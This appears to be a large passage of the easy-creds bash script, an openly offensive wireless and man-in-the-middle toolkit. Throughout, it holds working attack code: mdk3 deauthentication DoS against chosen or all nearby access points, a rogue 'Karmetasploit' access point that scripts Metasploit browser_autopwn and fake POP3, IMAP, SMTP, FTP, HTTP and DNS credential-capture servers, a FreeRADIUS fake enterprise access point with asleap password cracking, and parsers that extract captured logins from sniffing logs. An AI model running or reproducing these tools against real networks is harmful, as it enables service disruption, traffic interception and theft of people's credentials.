- screen -S easy-creds -t urlsnarf -X screen urlsnarf -i $TUNIFACE
- elif [ -z $wireless ] && [ -z $isxrunning ]; then
- screen -S easy-creds -t urlsnarf -X screen urlsnarf -i $IFACE
- screen -S easy-creds -X select 2
- screen -S easy-creds -X logfile $logfldr/urlsnarf-$(date +%F-%H%M).txt
- screen -S easy-creds -X log
- else
- y=$(($y+$yoffset))
- xterm -geometry "$width"x$height-$x+$y -T "URL Snarf" -l -lf $logfldr/urlsnarf-$(date +%F-%H%M).txt -bg black -fg green -e urlsnarf -i $IFACE &
- sleep 3
- fi
- echo -e "\n\e[1;33m[*] Launching Dsniff...\e[0m\n"
- if [ "$wireless" == "1" ]; then
- y=$(($y+$yoffset))
- xterm -geometry "$width"x$height-$x+$y -T "Dsniff" -bg blue -fg white -e dsniff -m -i $TUNIFACE -w $logfldr/dsniff$(date +%F-%H%M).log &
- sleep 3
- elif [ "$wireless" == "1" ] && [ -z $isxrunning ]; then
- screen -S easy-creds -t dsniff -X screen dsniff -m -i $TUNIFACE -w $logfldr/dsniff$(date +%F-%H%M).log
- elif [ -z $wireless ] && [ -z $isxrunning ]; then
- screen -S easy-creds -t dsniff -X screen dsniff -m -i $IFACE -w $logfldr/dsniff$(date +%F-%H%M).log
- else
- y=$(($y+$yoffset))
- xterm -geometry "$width"x$height-$x+$y -T "Dsniff" -bg blue -fg white -e dsniff -m -i $IFACE -w $logfldr/dsniff$(date +%F-%H%M).log &
- sleep 3
- fi
- if [ "$SIDEJACK" == "y" ]; then
- f_sidejack
- fi
- echo -e "\n\e[1;33m[*] Do you ever imagine things in the garden of your mind?\e[0m"
- sleep 5
- }
- ##################################################
- f_fakeapeviltwin(){
- eviltwin=1
- ESSID=default
- f_fakeapAttack
- }
- ##################################################
- f_mdk3aps(){
- clear
- f_Banner
- dosattack=1
- # grep the MACs to a temp white list
- ifconfig -a| grep wlan| grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-white.lst
- echo
- read -p "Do you have the BSSID address of the AP you'd like to attack? [y/N]: " havemac
- havemac="$(echo ${havemac} | tr 'A-Z' 'a-z')"
- echo
- if [ "$havemac" == "y" ]; then
- dosmac=
- while [ -z "$dosmac" ]; do read -p "Please enter the BSSID address of the AP you wish to DoS: " dosmac; done
- echo "$dosmac" > /tmp/ec/ec-dosap
- airmon-ng | egrep 'wlan|ath' | sed '$a\\n'
- doswlan=
- while [ -z $doswlan ];do read -p "Please enter the wireless device to use for DoS attack: " doswlan; done
- phyint=$(airmon-ng | grep $doswlan | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;")
- echo -e "\nPlacing the wireless card in monitor mode to perform DoS attack."
- airmon-ng start $doswlan &
- sleep 3
- dosmon=$(airmon-ng | sed -n "s/.*\(mon.*$phyint\).*/\1/p;" | cut -f1)
- echo -e "\nUsing $dosmon for the attack.\n\n"
- echo -e "\n\e[1;33m[*] Please stand by while we DoS the AP with BSSID Address $dosmac...\e[0m"
- sleep 3
- if [ -z $isxrunning ]; then
- screen -S easy-creds -t MDK3-DoS -X screen mdk3 $dosmon d -b /tmp/ec/ec-dosap
- else
- xterm -geometry "$width"x$height+$x-$y -T "MDK3 AP DoS" -e mdk3 $dosmon d -b /tmp/ec/ec-dosap &
- fi
- echo $! > /tmp/dosap-pid
- sleep 5m && kill $(cat /tmp/ec/dosap-pid) &
- echo $! > /tmp/ec/sleep.pid
- echo -e "\n\e[1;33m[*] Attack will run for 5 minutes or you can close the xterm window to stop the AP DoS attack...\e[0m"
- else
- f_getbssids
- fi
- }
- ##################################################
- f_lastman(){
- clear
- f_Banner
- dosattack=1
- echo -e "\n\e[1;33m[*] This attack will DoS every AP BSSID & Client MAC it can reach.\e[0m\n\e[1;31mUse with extreme caution\e[0m\n\n"
- # grep the MACs to a temp white list
- ifconfig | grep wlan| grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-white.lst
- airmon-ng | egrep '(wlan|mon)' | sed '$a\\n'
- doswlan=
- while [ -z $doswlan ];do read -p "Please enter the wireless device to use for DoS attack: " doswlan; done
- phyint=$(airmon-ng | grep $doswlan | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;")
- echo -e "\nPlacing the wireless card in monitor mode to perform DoS attack."
- airmon-ng start $doswlan &
- sleep 3
- dosmon=$(airmon-ng | sed -n "s/.*\(mon.*$phyint\).*/\1/p;" | cut -f1)
- echo -e "\nUsing $dosmon for attack."
- if [ -z $isxrunning ]; then
- screen -S easy-creds -t Last-Man-Standing -X screen mdk3 $dosmon d -w /tmp/ec/ec-white.lst;(airmon-ng stop $dosmon >/dev/null)
- else
- xterm -geometry 70x10+0-0 -T "Last Man Standing" -e mdk3 $dosmon d -w /tmp/ec/ec-white.lst;(airmon-ng stop $dosmon >/dev/null) &
- fi
- echo $! > /tmp/ec/dosap-pid
- sleep 5m && kill $(cat /tmp/ec/dosap-pid) &
- echo $! > /tmp/ec/sleep.pid
- airmon-ng stop $dosmon >/dev/null
- echo -e "\n\e[1;33m[*] Attack will run for 5 minutes or you can close the xterm window to stop the AP DoS attack...\e[0m"
- sleep 7
- }
- ##################################################
- f_getbssids(){
- clear
- f_Banner
- echo -e "\n\e[1;33m[*] This will launch airodump-ng and allow you to specify the AP to DoS\e[0m\n"
- airmon-ng | grep wlan | sed '$a\\n'
- airowlan=
- while [ -z $airowlan ];do read -p "Please enter the wireless device to use for DoS attack: " airowlan; done
- phyint=$(airmon-ng | grep $airowlan | sed -n "s/.*\([[].*[]]\).*/\1/;s/[[]//;s/[]]//p;")
- echo -e "\nPlacing the wireless card in monitor mode to perform DoS attack."
- airmon-ng start $airowlan > /dev/null &
- sleep 3
- airomon=$(airmon-ng | sed -n "s/.*\(mon.*$phyint\).*/\1/p;" | cut -f1)
- echo -e "\n\e[1;33m[*] Starting airodump-ng with $airomon, [ctrl+c] in the window when you see the ESSID(s) you want to attack.\e[0m\n"
- if [ -z $isxrunning ]; then
- screen -S easy-creds -t Airodump -X screen $airodumppath/airodump-ng $airomon -w /tmp/ec/airodump-ec --output-format csv
- else
- xterm -geometry 90x25+0+0 -T "Airodump" -e $airodumppath/airodump-ng $airomon -w /tmp/ec/airodump-ec --output-format csv &
- fi
- echo $! > /tmp/ec/airodump-pid
- #wait for the process to die
- while [ ! -z $(ps -p "$(cat /tmp/ec/airodump-pid)" | grep "$(cat /tmp/ec/airodump-pid)" | sed 's/ //g') ]; do sleep 3; done
- sleep 3
- #sometimes the mon interface doesn't transition properly after airodump, decided to stop the interface and restart it clean
- airmon-ng stop $airomon &> /dev/null
- echo -e "\n\e[1;33m[*] The following APs were identified:\e[0m\n"
- #IFS variable allows for spaces in the name of the ESSIDs and will still display it on one line
- SAVEIFS=$IFS
- IFS=$(echo -en "\n\b")
- for apname in $(cat /tmp/ec/airodump-ec-01.csv | egrep -a '(OPN|MGT|WEP|WPA)'| cut -d "," -f14| sort -u);do
- echo [*] "$apname"
- done
- echo
- IFS=$SAVEIFS
- dosapname=
- while [ -z $dosapname ]; do
- read -p "Please enter the ESSID you'd like to attack: " dosapname
- done
- cat /tmp/ec/airodump-ec-01.csv | egrep -a '(OPN|MGT|WEP|WPA)'| grep -a -i "$dosapname" |cut -d "," -f1 > /tmp/ec/ec-macs
- rm /tmp/ec/airodump-ec*
- #Make sure none of your MACs end up in the blacklist
- diff -i /tmp/ec/ec-macs /tmp/ec/ec-white.lst | grep -v ">"|grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' > /tmp/ec/ec-dosap
- echo -e "\nNow Deauthing clients from $dosapname.\n\nIf there is more than one BSSID, all will be attacked...\n"
- airmon-ng start $airowlan &> /dev/null
- sleep 3
- if [ -z $isxrunning ]; then
- screen -S easy-creds -t MDK3-AP-DoS -X screen mdk3 $airomon d -b /tmp/ec/ec-dosap;(airmon-ng stop $airomon >/dev/null)
- echo -e "\n Exit the MDK3-AP-DoS in the easy-creds session to stop the attack"
- sleep 5
- else
- xterm -geometry 70x10+0-0 -T "MDK3 AP DoS" -e mdk3 $airomon d -b /tmp/ec/ec-dosap;(airmon-ng stop $airomon >/dev/null) &
- echo -e "\nPlease close the xterm window to stop the attack..."
- sleep 5
- fi
- }
- ##################################################
- f_KarmaAttack(){
- wireless=1
- karmasploit=1
- # Credit to Metasploit Unleashed, used as a base
- clear
- f_Banner
- f_xtermwindows
- echo -e "Network Interfaces:\n"
- ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n'
- while [ -z $IFACE ]; do read -p "Interface connected to the internet, example eth0: " IFACE; done
- airmon-ng
- while [ -z $WIFACE ]; do read -p "Wireless interface name, example wlan0: " WIFACE; done
- airmon-ng start $WIFACE &> /dev/null
- modprobe tun
- echo -e "\n\e[1;33m[*] Your interface has now been placed in Monitor Mode\e[0m\n"
- airmon-ng | grep mon | sed '$a\\n'
- MONMODE=
- while [ -z $MONMODE ]; do read -p "Enter your monitor enabled interface name (ex. mon0): " MONMODE; done
- TUNIFACE=
- while [ -z $TUNIFACE ]; do read -p "Enter your tunnel interface (ex. at0): " TUNIFACE; done
- f_karmadhcp
- f_karmasetup
- f_karmafinal
- f_mainmenu
- }
- ##################################################
- f_karmadhcp(){
- ATCIDR=
- while [ -z $ATCIDR ]; do read -p "Network range for your tunneled interface, example 10.0.0.0/24: " ATCIDR; done
- ATDNS=
- while [ -z $ATDNS ]; do read -p "Enter the IP address for the DNS server, example 8.8.8.8: " ATDNS; done
- f_ipcalc
- }
- ##################################################
- f_karmasetup(){
- echo "use auxiliary/server/browser_autopwn" >> /tmp/ec/karma.rc
- echo "setg AUTOPWN_HOST $ATIP" >> /tmp/ec/karma.rc
- echo "setg AUTOPWN_PORT 55550" >> /tmp/ec/karma.rc
- echo "setg AUTOPWN_URI /ads" >> /tmp/ec/karma.rc
- echo "set LHOST $ATIP" >> /tmp/ec/karma.rc
- echo "set LPORT 45000" >> /tmp/ec/karma.rc
- echo "set SRVPORT 55550" >> /tmp/ec/karma.rc
- echo "set URIPATH /ads" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- echo "use auxiliary/server/capture/pop3" >> /tmp/ec/karma.rc
- echo "set SRVPORT 110" >> /tmp/ec/karma.rc
- echo "set SSL false" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- echo "use auxiliary/server/capture/pop3" >> /tmp/ec/karma.rc
- echo "set SRVPORT 995" >> /tmp/ec/karma.rc
- echo "set SSL true" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- echo "use auxiliary/server/capture/ftp" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- echo "use auxiliary/server/capture/imap" >> /tmp/ec/karma.rc
- echo "set SSL false" >> /tmp/ec/karma.rc
- echo "set SRVPORT 143" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- echo "use auxiliary/server/capture/imap" >> /tmp/ec/karma.rc
- echo "set SSL true" >> /tmp/ec/karma.rc
- echo "set SRVPORT 993" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- echo "use auxiliary/server/capture/smtp" >> /tmp/ec/karma.rc
- echo "set SSL false" >> /tmp/ec/karma.rc
- echo "set SRVPORT 25" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- echo "use auxiliary/server/capture/smtp" >> /tmp/ec/karma.rc
- echo "set SSL true" >> /tmp/ec/karma.rc
- echo "set SRVPORT 465" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- echo "use auxiliary/server/fakedns" >> /tmp/ec/karma.rc
- echo "unset TARGETHOST" >> /tmp/ec/karma.rc
- echo "set SRVPORT 5353" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- echo "use auxiliary/server/fakedns" >> /tmp/ec/karma.rc
- echo "unset TARGETHOST" >> /tmp/ec/karma.rc
- echo "set SRVPORT 53" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc
- echo "set SRVPORT 80" >> /tmp/ec/karma.rc
- echo "set SSL false" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc
- echo "set SRVPORT 8080" >> /tmp/ec/karma.rc
- echo "set SSL false" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc
- echo "set SRVPORT 443" >> /tmp/ec/karma.rc
- echo "set SSL true" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- echo "use auxiliary/server/capture/http" >> /tmp/ec/karma.rc
- echo "set SRVPORT 8443" >> /tmp/ec/karma.rc
- echo "set SSL true" >> /tmp/ec/karma.rc
- echo "run" >> /tmp/ec/karma.rc
- }
- ##################################################
- f_karmafinal(){
- echo -e "\n\e[1;33m[*] Launching Airbase...\e[0m"
- # airbase-ng is going to create our fake AP with the SSID default
- if [ -z $isxrunning ]; then
- screen -dmS easy-creds -t Airbase-NG airbase-ng -P -C 60 -e default $MONMODE
- else
- xterm -geometry "$width"x$height-$x+$y -T "Airbase-NG" -e airbase-ng -P -C 60 -e "default" $MONMODE &
- fi
- echo $! > /tmp/ec/ec-karma-pid
- sleep 7
- echo -e "\n\e[1;33m[*] Configuring tunneled interface.\e[0m"
- ifconfig $TUNIFACE up
- ifconfig $TUNIFACE $ATIP netmask $ATSUB
- ifconfig $TUNIFACE mtu 1400
- route add -net $ATNET netmask $ATSUB gw $ATIP dev $TUNIFACE
- sleep 3
- echo -e "\n\e[1;33m[*] Setting up iptables to handle traffic seen by the tunneled interface.\e[0m"
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -P FORWARD ACCEPT
- iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
- sleep 3
- #Blackhole Routing - Forces clients to go through attacker even if they have cached DNS entries
- iptables -t nat -A PREROUTING -i $TUNIFACE -j REDIRECT
- echo -e "\n\e[1;33m[*] Launching Tail...\e[0m"
- if [ -z $isxrunning ]; then
- screen -S easy-creds -t DMESG -X screen tail -f /var/log/messages
- else
- y=$(($y+$yoffset))
- xterm -geometry "$width"x$height-$x+$y -T "DMESG" -bg black -fg red -e tail -f /var/log/messages &
- fi
- echo $! > /tmp/ec/tail.pid
- sleep 3
- echo -e "\n\e[1;33m[*] DHCP server starting on tunneled interface.\e[0m\n"
- if [ -e /etc/dhcp3/dhcpd.conf ]; then
- dhcpd3 -q -cf $DHCPPATH -pf /var/run/dhcp3-server/dhcpd.pid $TUNIFACE &
- elif [ -e /etc/sysconfig/dhcpd ]; then
- systemctl start dhcpd.service
- else
- service dhcpd start
- fi
- sleep 3
- if [ -z $isxrunning ]; then
- echo -e "\n\e[1;33m[*] Launching Karmetasploit in screen. Once it loads press ctrl-a then d return to this window.\e[0m\n"
- sleep 5
- screen -S Karmetasploit -t msfconsole msfconsole -r /tmp/ec/karma.rc
- else
- echo -e "\n\e[1;33m[*] Launching Karmetasploit, this may take a little bit...\e[0m\n"
- y=$(($y+$yoffset))
- xterm -geometry "$width"x$height-$x+$y -bg black -fg white -T "Karmetasploit" -e msfconsole -r /tmp/ec/karma.rc &
- echo $! > /tmp/ec/ec-metasploit-pid
- fi
- #Enable IP forwarding
- echo "1" > /proc/sys/net/ipv4/ip_forward
- echo -e "\n\e[1;33m[*] Do you ever imagine things in the garden of your mind?\e[0m"
- sleep 5
- }
- ##################################################
- f_freeradiusattack(){
- clear
- f_Banner
- fra=1
- atheroscard=$(lsmod | grep -c 'ath')
- if [ -z $atheroscard ]; then
- echo -e "\n\e[1;31m[-] I could not find and Atheros wireless card.\nAttack only works with an atheros chipset...\e[0m\n"
- sleep 5
- fi
- mv $pathtoradiusconf/radiusd.conf $pathtoradiusconf/radiusd.conf.back
- mv $pathtoradiusconf/clients.conf $pathtoradiusconf/clients.conf.back
- if [ -e $pathtoradiusconf ]; then
- cat $pathtoradiusconf/radiusd.conf.back | sed -e '/^proxy_request/s/yes/no/' -e 's/\$INCLUDE proxy.conf/#\$INCLUDE proxy.conf/' > $pathtoradiusconf/radiusd.conf
- else
- while [! -e $pathtoradiusconf ] && [ -z $pathtoradiusconf ]; do
- echo -e "\n\e[1;31m[-] I cannot find your radius.conf file, please provide the path\e[0m"
- read -e -p ": " pathtoradiusconf
- done
- cat "$pathtoradiusconf" | sed -e '/^proxy_request/s/yes/no/' -e 's/\$INCLUDE proxy.conf/#\$INCLUDE proxy.conf/' > $pathtoradiusconf/radiusd.conf
- fi
- radiussecret=
- while [ -z $radiussecret ]; do
- read -p "Please enter the shared secret you'd like to use for the radius connection: " radiussecret
- done
- echo
- f_buildclientsconf
- f_hostapd
- f_freeradiusfinal
- f_mainmenu
- }
- ##################################################
- f_buildclientsconf(){
- echo "client localhost {" > $pathtoradiusconf/clients.conf
- echo " ipaddr = 127.0.0.1" >> $pathtoradiusconf/clients.conf
- echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf
- echo " require_message_authenticator = no" >> $pathtoradiusconf/clients.conf
- echo " nastype = other" >> $pathtoradiusconf/clients.conf
- echo "}" >> $pathtoradiusconf/clients.conf
- echo "client 192.168.0.0/16 {" >> $pathtoradiusconf/clients.conf
- echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf
- echo " shortname = testAP" >> $pathtoradiusconf/clients.conf
- echo "}" >> $pathtoradiusconf/clients.conf
- echo "client 172.16.0.0/12 {" >> $pathtoradiusconf/clients.conf
- echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf
- echo " shortname = testAP" >> $pathtoradiusconf/clients.conf
- echo "}" >> $pathtoradiusconf/clients.conf
- echo "client 10.0.0.0/8 {" >> $pathtoradiusconf/clients.conf
- echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf
- echo " shortname = testAP" >> $pathtoradiusconf/clients.conf
- echo "}" >> $pathtoradiusconf/clients.conf
- # echo "client $ATCIDR {" >> $pathtoradiusconf/clients.conf
- # echo " secret = $radiussecret" >> $pathtoradiusconf/clients.conf
- # echo " shortname = testAP" >> $pathtoradiusconf/clients.conf
- # echo "}" >> $pathtoradiusconf/clients.conf
- }
- ##################################################
- f_hostapd(){
- airmon-ng | grep 'wlan'
- radwiface=
- while [ -z $radwiface ]; do
- echo -en "\nPlease enter your wirless interface for the attack (ex: wlan0)"
- read -p " : " radwiface
- done
- radssid=
- while [ -z $radssid ]; do
- echo -en "\nPlease enter SSID you'd like to use for the attack (ex: FreeWifi)"
- read -p " : " radssid
- done
- radchannel=
- while [ -z $radchannel ]; do
- echo -en "\nPlease enter the channel you'd like to use for the attack"
- read -p " : " radchannel
- done
- echo "interface=$radwiface" > /tmp/ec/ec-hostapd.conf
- echo "driver=nl80211" >> /tmp/ec/ec-hostapd.conf
- echo "ssid=$radssid" >> /tmp/ec/ec-hostapd.conf
- echo "logger_stdout=-1" >> /tmp/ec/ec-hostapd.conf
- echo "logger_stdout_level=0" >> /tmp/ec/ec-hostapd.conf
- echo "dump_file=/tmp/hostapd.dump" >> /tmp/ec/ec-hostapd.conf
- echo "ieee8021x=1" >> /tmp/ec/ec-hostapd.conf
- echo "eapol_key_index_workaround=0" >> /tmp/ec/ec-hostapd.conf
- echo "own_ip_addr=127.0.0.1" >> /tmp/ec/ec-hostapd.conf
- echo "auth_server_addr=127.0.0.1" >> /tmp/ec/ec-hostapd.conf
- echo "auth_server_port=1812" >> /tmp/ec/ec-hostapd.conf
- echo "auth_server_shared_secret=$radiussecret" >> /tmp/ec/ec-hostapd.conf
- echo "wpa=1" >> /tmp/ec/ec-hostapd.conf
- echo "hw_mode=g" >> /tmp/ec/ec-hostapd.conf
- echo "channel=$radchannel" >> /tmp/ec/ec-hostapd.conf
- echo "wpa_pairwise=TKIP CCMP" >> /tmp/ec/ec-hostapd.conf
- echo "wpa_key_mgmt=WPA-EAP" >> /tmp/ec/ec-hostapd.conf
- }
- f_freeradiusfinal(){
- echo -e "\n\e[1;33m[*] Launching the FreeRadius server...\e[0m\n"
- if [ ! -z $isxrunning ]; then
- xterm -geometry "$width"x$height-$x+$y -T "radiusd" -bg white -fg black -e radiusd -X -f &
- echo $! > /tmp/ec/freeradius.pid
- sleep 3
- else
- screen -dmS FreeRadius -t radiusd $pathtoradiusd/radiusd -X -f
- echo $! > /tmp/ec/freeradius.pid
- fi
- echo -e "\n\e[1;33m[*] Launching hostapd...\e[0m\n"
- sleep 3
- if [ ! -z $isxrunning ]; then
- y=$(($y+$yoffset))
- xterm -geometry "$width"x$height-$x+$y -T "hostapd" -bg black -fg white -e $pathtohostapd/hostapd /tmp/ec/ec-hostapd.conf &
- sleep 3
- else
- screen -S FreeRadius -t hostapd -X screen $pathtohostapd/hostapd /tmp/ec/ec-hostapd.conf
- echo $! > /tmp/ec/hostapd.pid
- fi
- if [ ! -e $freeradiuslog ]; then
- touch $findradiuslog/freeradius-server-wpe.log
- freeradiuslog=$findradiuslog/freeradius-server-wpe.log
- fi
- echo -e "\n\e[1;33m[*] Launching credential log file...\e[0m\n"
- sleep 3
- if [ ! -z $isxrunning ]; then
- y=$(($y+$yoffset))
- xterm -geometry "$width"x$height-$x+$y -T "credentials" -bg black -fg green -hold -l -lf $logfldr/freeradius-creds-$(date +%F-%H%M).txt -e tail -f $freeradiuslog &
- echo $! > /tmp/ec/tail.pid
- sleep 3
- else
- screen -S FreeRadius -t credentials -X screen tail -f $freeradiuslog/freeradius-server-wpe.log
- screen -S easy-creds -X select 2
- screen -S easy-creds -X logfile $logfldr/freeradius-creds-$(date +%F-%H%M).txt
- screen -S easy-creds -X log
- echo $! > /tmp/ec/tail.pid
- fi
- tshark -i $radwiface -w $logfldr/freeradius-creds-$(date +%F-%H%M).dump &> /dev/null &
- echo $! > /tmp/ec/tshark.pid
- }
- ##################################################
- #
- # DATA REVIEW FUNCTIONS
- #
- ##################################################
- f_SSLStrip(){
- clear
- f_Banner
- if [ -d $logfldr ]; then
- echo "SSLStrip logs in current log folder:"
- ls $logfldr/sslstrip* 2>/dev/null
- echo -e "\n\n"
- fi
- if [ -e /$PWD/strip-accts.txt ]; then rm /$PWD/strip-accts.txt; fi
- # Coded with help from 'Crusty Old Fart' - Ubuntu Forums
- LOGPATH=
- while [ -z $LOGPATH ] || [ ! -f "$LOGPATH" ]; do read -e -p "Enter the full path to your SSLStrip log file: " LOGPATH; done
- DEFS=
- while [ -z $DEFS ] || [ ! -e "$DEFS" ]; do
- read -e -p "Enter the full path to your definitions file [/pentest/sniffers/easy-creds/definitions.sslstrip]: " DEFS
- if [ -z $DEFS ]; then DEFS="/pentest/sniffers/easy-creds/definitions.sslstrip"; fi
- done
- NUMLINES=$(cat "$DEFS" | wc -l)
- i=1
- while [ $i -le "$NUMLINES" ]; do
- VAL1=$(awk -v k=$i 'FNR == k {print $1}' "$DEFS")
- VAL2=$(awk -v k=$i 'FNR == k {print $2}' "$DEFS")
- VAL3=$(awk -v k=$i 'FNR == k {print $3}' "$DEFS")
- VAL4=$(awk -v k=$i 'FNR == k {print $4}' "$DEFS")
- GREPSTR="$(grep -a $VAL2 "$LOGPATH" | grep -a $VAL3 | grep -a $VAL4)"
- if [ "$GREPSTR" ]; then
- echo -n "$VAL1" "- " >> /$PWD/strip-accts.txt
- echo "$GREPSTR" | \
- sed -e 's/.*'$VAL3'=/'$VAL3'=/' -e 's/&/ /' -e 's/&.*//' >> /$PWD/strip-accts.txt
- fi
- i=$[$i+1]
- done
- if [ -s /$PWD/strip-accts.txt ] && [ -z $isxrunning ]; then
- cat /$PWD/strip-accts.txt | less
- elif [ -s /$PWD/strip-accts.txt ] && [ ! -z $isxrunning ]; then
- xterm -geometry 80x24-0+0 -T "SSLStrip Accounts" -hold -bg white -fg black -e cat /$PWD/strip-accts.txt &
- else
- echo -e "\n\e[1;31m[-] Sorry no credentials captured...\e[0m"
- fi
- }
- #######################################################
- f_dsniff(){
- clear
- f_Banner
- if [ -d $logfldr ]; then
- echo "Dsniff logs in current log folder:"
- ls $logfldr/ 2>/dev/null
- echo -e "\n\n"
- fi
- DSNIFFPATH=
- while [ -z $DSNIFFPATH ] || [ ! -f "$DSNIFFPATH" ]; do
- read -e -p "Enter the path for your dsniff Log file: " DSNIFFPATH
- done
- dsniff -r $DSNIFFPATH >> /$PWD/dsniff-log.txt
- if [ -z $isxrunning ];then
- cat /$PWD/dnsiff-log.txt | less
- else
- xterm -hold -bg blue -fg white -geometry 80x24-0+0 -T "Dsniff Accounts" -e cat /$PWD/dsniff-log.txt &
- fi
- }
- ##################################################
- f_EtterLog(){
- clear
- f_Banner
- if [ -d $logfldr ]; then
- echo "Ettercap logs in current log folder:"
- ls $logfldr/*.eci 2>/dev/null
- echo -e "\n\n"
- fi
- ETTERECI=
- while [ -z $ETTERECI ] || [ ! -f "$ETTERECI" ]; do read -e -p "Enter the full path to your ettercap.eci log file: " ETTERECI; done
- etterlog -p "$ETTERECI" >> /$PWD/etterlog.txt
- if [ -z $isxrunning ]; then
- cat /$PWD/etterlog.txt | less
- else
- xterm -hold -bg blue -fg white -geometry 80x24-0+0 -T "Ettercap Accounts" -e cat /$PWD/etterlog.txt &
- fi
- }
- ##################################################
- f_freeradiuscreds(){
- while [ -z "$credlist" ] && [ ! -e "$credlist" ]; do
- echo -n -e "\nPlease enter the path to your FreeRadius Attack credential list"
- read -e -p ": " credlist
- done
- while [ -z "$wordlist" ] && [ ! -e "$wordlist" ]; do
- echo -n -e "\nPlease enter the path to your wordlist"
- read -e -p ": " wordlist
- done
- echo -n -e "\n\e[1;33m[*] Please standby, this may take a while...\e[0m"
- acreds="$PWD/asleap-creds-$(date +%F-%H%M).txt"
- touch $acreds
- cat $credlist|egrep 'username|challenge|response'| cut -d " " -f2 > /tmp/ec/freeradius-creds.tmp
- NUMLINES=$(cat /tmp/ec/freeradius-creds.tmp | wc -l)
- i=1
- while [ $i -le "$NUMLINES" ]; do
- username=$(awk NR==$i /tmp/ec/freeradius-creds.tmp)
- i=$[$i+1]
- challenge=$(awk NR==$i /tmp/ec/freeradius-creds.tmp|tr -d '\r')
- i=$[$i+1]
- response=$(awk NR==$i /tmp/ec/freeradius-creds.tmp|tr -d '\r')
- i=$[$i+1]
- echo "Username: $username" >> "$acreds"
- $asleappath/asleap -C $challenge -R $response -W $wordlist | grep "password:"| sed -e 's/[\t ]//g;/^$/d'| sed -e 's/:/: /g' >> "$acreds"
- echo >> $acreds
- done
- echo -n -e "\n\e[1;33m[*] Your cracked credentials can be found at $acreds...\e[0m"
- sleep 5
- f_mainmenu
- }
- ##################################################
- #
- # MENU FUNCTIONS
- #
- ##################################################
- f_Banner(){
- echo -e " ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ "
- echo -e "||\e[1;36me\e[0m |||\e[1;36ma\e[0m |||\e[1;36ms\e[0m |||\e[1;36my\e[0m |||\e[1;36m-\e[0m |||\e[1;36mc\e[0m |||\e[1;36mr\e[0m |||\e[1;36me\e[0m |||\e[1;36md\e[0m |||\e[1;36ms\e[0m ||"
- echo -e "||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||"
- echo -e "|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|"
- echo -e "\e[1;33m Version 3.7.3K - KALI of Your Mind\e[0m"
- echo
- echo -e "\e[1;33mAt any time,\e[0m \e[1;36mctrl+c\e[0m \e[1;33m to cancel and return to the main menu\e[0m"
- echo
- }
- ##################################################
- f_prereqs(){
- clear
- f_Banner
- echo "1. Edit etter.conf"
- echo "2. Edit etter.dns"
- echo "3. Install dhcp3 server"
- echo "4. Install karmetasploit prereqs"
- echo "5. Add tunnel interface to dhcp3-server file"
- echo "6. Update Metasploit Framework"
- echo "7. Update Aircrack-ng"
- echo "8. Update SSLStrip"
- echo "9. How-to Videos (Launches Web Browser)"
- echo "10. Previous Menu"
- echo
- read -p "Choice: " prereqschoice
- case $prereqschoice in
- 1) f_nanoetter ;;
- 2) f_nanoetterdns ;;
- 3) f_dhcp3install ;;
- 4) f_karmareqs ;;
- 5) f_addtunnel ;;
- 6) f_msfupdate ;;
- 7) f_aircrackupdate ;;
- 8) f_sslstrip_vercheck ;;
- 9) f_howtos ;;
- 10) f_mainmenu ;;
- *) f_prereqs ;;
- esac
- }
- ##################################################
- f_poisoning(){
- clear
- f_Banner
- echo "1. Create Victim Host List"
- echo "2. Standard ARP Poison"
- echo "3. Oneway ARP Poison"
- echo "4. DHCP Poison"
- echo "5. DNS Poison"
- echo "6. ICMP Poison"
- echo "7. Previous Menu"
- echo
- read -p "Choice: " poisoningchoice
- case $poisoningchoice in
- 1) f_HostScan ;;
- 2) f_Standard ;;
- 3) f_Oneway ;;
- 4) f_DHCPPoison ;;
- 5) f_DNSPoison ;;
- 6) f_ICMP ;;
- 7) f_mainmenu ;;
- *) f_poisoning ;;
- esac
- }
- ##################################################
- f_fakeapattacks(){
- clear
- f_Banner
- echo "1. FakeAP Attack Static"
- echo "2. FakeAP Attack EvilTwin"
- echo "3. Karmetasploit Attack"
- echo "4. FreeRadius Attack"
- echo "5. DoS AP Options"
- echo "6. Previous Menu"
- echo
- read -p "Choice: " fapchoice
- case $fapchoice in
- 1) f_fakeapAttack ;;
- 2) f_fakeapeviltwin ;;
- 3) f_KarmaAttack ;;
- 4) f_freeradiusattack ;;
- 5) f_DoSOptions ;;
